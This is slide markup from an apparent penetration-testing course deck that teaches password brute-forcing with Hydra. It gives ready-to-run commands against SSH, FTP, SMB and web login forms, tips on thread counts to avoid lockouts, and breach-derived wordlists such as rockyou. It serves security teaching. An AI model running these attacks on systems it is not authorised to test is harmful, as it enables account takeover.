        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="2880360"/>
            <a:ext cx="8503920" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1550" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>hydra -L users.txt -P passwords.txt ssh://192.168.56.101 -t 4 -V -f</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="3401568"/>
            <a:ext cx="8503920" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>service and target go last, always in that URL form</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4224528"/>
            <a:ext cx="1371600" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-l  /  -L</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2148840" y="4242816"/>
            <a:ext cx="3931920" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>one username  /  a file of usernames</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="4224528"/>
            <a:ext cx="1371600" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-p  /  -P</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7772400" y="4242816"/>
            <a:ext cx="3931920" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>one password  /  a file of passwords</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4937760"/>
            <a:ext cx="1371600" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-t 4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2148840" y="4956048"/>
            <a:ext cx="3931920" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>parallel tasks. Lower is slower and far less likely to trip a lockout</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="4937760"/>
            <a:ext cx="1371600" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-V</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7772400" y="4956048"/>
            <a:ext cx="3931920" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>print every attempt. Useful while learning, noisy afterwards</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="5650992"/>
            <a:ext cx="1371600" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-f</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2148840" y="5669280"/>
            <a:ext cx="3931920" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>stop as soon as one valid pair is found</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="5650992"/>
            <a:ext cx="1371600" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-s 2222</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7772400" y="5669280"/>
            <a:ext cx="3931920" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>non standard port</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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04 / CREDENTIALS</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Recipes and wordlists</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35</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 0" descr="img/t_hydra.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1481328"/>
            <a:ext cx="6766560" cy="3154680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7680960" y="1554480"/>
            <a:ext cx="3931920" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>WORDLISTS ON KALI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7680960" y="1920240"/>
            <a:ext cx="3950208" cy="2011680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1755"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1755"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>rockyou.txt, 14 million real passwords from a 2009 breach</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1755"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1755"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>seclists, the collection everyone actually uses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1755"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1755"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Start with the top 100, not with 14 million</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7680960" y="3931920"/>
            <a:ext cx="3950208" cy="734314"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7471"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1338"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7827264" y="4069080"/>
            <a:ext cx="3657600" cy="459994"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1595"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t># unzip it first</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1595"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>$ gunzip rockyou.txt.gz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="4846320"/>
            <a:ext cx="11091672" cy="1213104"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4523"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1338"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694944" y="4983480"/>
            <a:ext cx="10799064" cy="938784"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1740"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>$ hydra -l root -P top100.txt ftp://TARGET</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1740"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>$ hydra -L users.txt -P top100.txt smb://TARGET</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1740"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>$ hydra -l admin -P top100.txt TARGET http-post-form \</a:t>
